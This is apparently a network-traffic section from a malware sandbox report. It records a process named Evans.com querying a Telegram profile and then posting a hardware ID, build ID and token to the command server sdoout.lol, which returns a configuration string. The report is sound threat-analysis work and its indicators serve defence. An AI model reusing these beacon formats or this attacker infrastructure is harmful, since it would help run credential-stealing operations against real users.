                                                                                                                                                                                                                                                                                                                                    0192.168.2.54971540.115.3.253443
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:13 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 44 75 59 36 39 71 67 54 75 45 47 59 4b 32 4e 76 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 38 33 31 62 32 32 63 63 61 63 31 64 39 33 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: CNT 1 CON 304MS-CV: DuY69qgTuEGYK2Nv.1Context: 5831b22ccac1d93
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:13 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:13 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 44 75 59 36 39 71 67 54 75 45 47 59 4b 32 4e 76 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 38 33 31 62 32 32 63 63 61 63 31 64 39 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 36 79 43 6d 44 58 38 52 4d 4f 78 76 50 2b 35 4e 4f 72 49 4b 71 36 46 77 65 38 6a 6a 63 6d 42 78 67 58 43 4e 7a 45 37 4b 74 66 69 48 59 65 70 4d 67 33 65 2f 52 45 33 66 65 58 6a 50 31 57 31 67 4c 65 2f 57 51 35 6b 4a 37 36 50 52 75 51 77 45 4e 4c 71 31 74 72 54 76 58 32 2f 58 41 63 4d 41 2f 76 6f 35 4c 34 68 6a 43 6d 54 44 56
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: DuY69qgTuEGYK2Nv.2Context: 5831b22ccac1d93<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY6yCmDX8RMOxvP+5NOrIKq6Fwe8jjcmBxgXCNzE7KtfiHYepMg3e/RE3feXjP1W1gLe/WQ5kJ76PRuQwENLq1trTvX2/XAcMA/vo5L4hjCmTDV
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:13 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 44 75 59 36 39 71 67 54 75 45 47 59 4b 32 4e 76 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 38 33 31 62 32 32 63 63 61 63 31 64 39 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: BND 3 CON\WNS 0 196MS-CV: DuY69qgTuEGYK2Nv.3Context: 5831b22ccac1d93<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:13 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:13 UTC58INData Raw: 4d 53 2d 43 56 3a 20 79 63 69 55 6e 2b 64 61 6f 45 57 37 77 61 62 6e 64 6b 4e 4e 54 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: MS-CV: yciUn+daoEW7wabndkNNTw.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                    1192.168.2.54975240.115.3.253443
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:23 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 69 76 30 55 35 44 33 6d 52 55 75 78 41 48 4f 2f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 39 32 37 37 64 62 66 63 33 64 64 33 36 39 38 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: CNT 1 CON 305MS-CV: iv0U5D3mRUuxAHO/.1Context: 29277dbfc3dd3698
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:23 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:23 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 69 76 30 55 35 44 33 6d 52 55 75 78 41 48 4f 2f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 39 32 37 37 64 62 66 63 33 64 64 33 36 39 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 36 79 43 6d 44 58 38 52 4d 4f 78 76 50 2b 35 4e 4f 72 49 4b 71 36 46 77 65 38 6a 6a 63 6d 42 78 67 58 43 4e 7a 45 37 4b 74 66 69 48 59 65 70 4d 67 33 65 2f 52 45 33 66 65 58 6a 50 31 57 31 67 4c 65 2f 57 51 35 6b 4a 37 36 50 52 75 51 77 45 4e 4c 71 31 74 72 54 76 58 32 2f 58 41 63 4d 41 2f 76 6f 35 4c 34 68 6a 43 6d 54 44
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: iv0U5D3mRUuxAHO/.2Context: 29277dbfc3dd3698<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY6yCmDX8RMOxvP+5NOrIKq6Fwe8jjcmBxgXCNzE7KtfiHYepMg3e/RE3feXjP1W1gLe/WQ5kJ76PRuQwENLq1trTvX2/XAcMA/vo5L4hjCmTD
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:23 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 69 76 30 55 35 44 33 6d 52 55 75 78 41 48 4f 2f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 39 32 37 37 64 62 66 63 33 64 64 33 36 39 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: iv0U5D3mRUuxAHO/.3Context: 29277dbfc3dd3698<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:23 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:23 UTC58INData Raw: 4d 53 2d 43 56 3a 20 46 49 76 4d 47 52 58 6d 45 45 2b 68 39 71 64 64 71 2b 37 76 62 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: MS-CV: FIvMGRXmEE+h9qddq+7vbg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                    2192.168.2.54986640.115.3.253443
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:42 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 49 58 31 37 41 64 56 61 49 30 2b 2f 31 39 48 70 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 38 61 30 37 64 30 39 61 34 62 33 32 35 30 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: CNT 1 CON 305MS-CV: IX17AdVaI0+/19Hp.1Context: 98a07d09a4b32501
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:42 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:42 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 49 58 31 37 41 64 56 61 49 30 2b 2f 31 39 48 70 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 38 61 30 37 64 30 39 61 34 62 33 32 35 30 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 36 79 43 6d 44 58 38 52 4d 4f 78 76 50 2b 35 4e 4f 72 49 4b 71 36 46 77 65 38 6a 6a 63 6d 42 78 67 58 43 4e 7a 45 37 4b 74 66 69 48 59 65 70 4d 67 33 65 2f 52 45 33 66 65 58 6a 50 31 57 31 67 4c 65 2f 57 51 35 6b 4a 37 36 50 52 75 51 77 45 4e 4c 71 31 74 72 54 76 58 32 2f 58 41 63 4d 41 2f 76 6f 35 4c 34 68 6a 43 6d 54 44
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: IX17AdVaI0+/19Hp.2Context: 98a07d09a4b32501<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY6yCmDX8RMOxvP+5NOrIKq6Fwe8jjcmBxgXCNzE7KtfiHYepMg3e/RE3feXjP1W1gLe/WQ5kJ76PRuQwENLq1trTvX2/XAcMA/vo5L4hjCmTD
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:42 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 49 58 31 37 41 64 56 61 49 30 2b 2f 31 39 48 70 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 38 61 30 37 64 30 39 61 34 62 33 32 35 30 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: IX17AdVaI0+/19Hp.3Context: 98a07d09a4b32501<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:42 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:45:42 UTC58INData Raw: 4d 53 2d 43 56 3a 20 48 7a 6a 75 70 6c 43 31 4a 45 4f 6f 55 37 71 74 6c 64 4b 66 65 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: MS-CV: HzjuplC1JEOoU7qtldKfew.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    3192.168.2.549988149.154.167.994432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:03 UTC85OUTGET /w211et HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: t.me
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:03 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:03 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                    Content-Length: 12299
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: stel_ssid=0858ffa790ed537ffa_10782425019224275256; expires=Wed, 01 Jan 2025 08:46:03 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                    Cache-control: no-store
                                                                                                                                                                                                                                                                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:03 UTC12299INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 77 32 31 31 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @w211et</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    4192.168.2.549989116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:04 UTC183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:04 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    5192.168.2.549990116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:05 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----37q1nohlnycbieu3eu3o
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 256
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:05 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 33 37 71 31 6e 6f 68 6c 6e 79 63 62 69 65 75 33 65 75 33 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 43 34 41 43 32 43 46 34 39 33 33 31 35 38 38 32 31 30 39 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 33 37 71 31 6e 6f 68 6c 6e 79 63 62 69 65 75 33 65 75 33 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 33 37 71 31 6e 6f 68 6c 6e 79 63 62 69 65 75 33 65 75 33 6f 2d 2d 0d
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------37q1nohlnycbieu3eu3oContent-Disposition: form-data; name="hwid"FCC4AC2CF4933158821099-a33c7340-61ca------37q1nohlnycbieu3eu3oContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------37q1nohlnycbieu3eu3o--
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:06 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:06 UTC70INData Raw: 33 62 0d 0a 31 7c 31 7c 31 7c 30 7c 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 7c 31 7c 31 7c 30 7c 31 7c 30 7c 31 30 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 3b1|1|1|0|8d103014deb63325e02411a3be5b5033|1|1|0|1|0|100000|10


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    6192.168.2.549992116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:06 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----mgvs0hvs2v3w4e3euk6p
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:06 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 6d 67 76 73 30 68 76 73 32 76 33 77 34 65 33 65 75 6b 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 6d 67 76 73 30 68 76 73 32 76 33 77 34 65 33 65 75 6b 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 6d 67 76 73 30 68 76 73 32 76 33 77 34 65 33 65 75 6b 36 70 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------mgvs0hvs2v3w4e3euk6pContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------mgvs0hvs2v3w4e3euk6pContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------mgvs0hvs2v3w4e3euk6pCont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
